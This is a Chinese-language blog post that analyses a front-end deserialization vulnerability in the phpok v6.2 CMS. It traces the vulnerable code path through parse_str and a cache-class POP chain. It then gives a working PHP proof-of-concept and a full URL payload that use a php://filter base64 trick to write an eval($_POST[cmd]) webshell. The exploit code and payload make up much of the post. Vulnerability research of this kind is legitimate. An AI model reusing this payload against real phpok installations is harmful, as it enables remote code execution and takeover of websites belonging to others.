Y0ng的博客
0%

phpok v6.2

发表于 分类于

漏洞描述

phpok v6.2存在前台反序列化漏洞,可写入webshell

漏洞分析

这套cms的两个参数:c = 控制器 f = 函数

framework\api\call_control.php#index

data参数为json格式,解析之后不允许存在type_id

image-20220823192310421

往下进入framework\phpok_tpl_helper.php#phpok函数

image-20220823192435631

调用framework\phpok_call.php#phpok函数

image-20220823192513656

通过 parse_str 这里产生漏洞,控制了type_id参数

image-20220823192758472

接着根据$id即 m_picplayer 去获取一套模板数组$call_rs,再通过array_merge合并,导致type_id的值可控

image-20220823193211462

修改为 format_ext_all

image-20220823193416311

根据type_id的值加上下划线,构造出的函数名必须在这33个之中,这里还能挖掘其他32个函数的利用

image-20220823193544127

然后调用该函数就是存在反序列化的函数,跟着构造就完事了

image-20220823193749126

POP

pop chain有手就行,全局搜索 __destruct() 发现 framework\engine\cache.php#__destruct() 存在save,而且两个参数都可控

image-20220823193945436

文件名,文件内容都可控,就是加了一个exit,php://filter加编码器直接过

image-20220823194026493

POC

<?php
class cache 
{
	public $folder = 'php://filter/write=string.strip_tags|convert.base64-decode/resource=D:/phpstudy_pro/WWW/docker/smity2/html/';
	public $key_id = 'shell';
	public $key_list = 'aaaaaIDw/cGhwIGV2YWwoJF9QT1NUW2NtZF0pOz8+';
}
$exp = urlencode(urlencode(serialize(new cache())));
echo($exp);

payload

http://127.0.0.1/api.php?c=call&f=index&data={"m_picplayer": "0%26type_id%3Dformat_ext_all%26x%5Bform_type%5D%3Durl%26x%5Bcontent%5D%3DO%253A5%253A%2522cache%2522%253A3%253A%257Bs%253A6%253A%2522folder%2522%253Bs%253A107%253A%2522php%253A%252F%252Ffilter%252Fwrite%253Dstring.strip_tags%257Cconvert.base64-decode%252Fresource%253DD%253A%252Fphpstudy_pro%252FWWW%252Fdocker%252Fsmity2%252Fhtml%252F%2522%253Bs%253A6%253A%2522key_id%2522%253Bs%253A5%253A%2522shell%2522%253Bs%253A8%253A%2522key_list%2522%253Bs%253A41%253A%2522aaaaaIDw%252FcGhwIGV2YWwoJF9QT1NUW2NtZF0pOz8%252B%2522%253B%257D"}

image-20220823200533226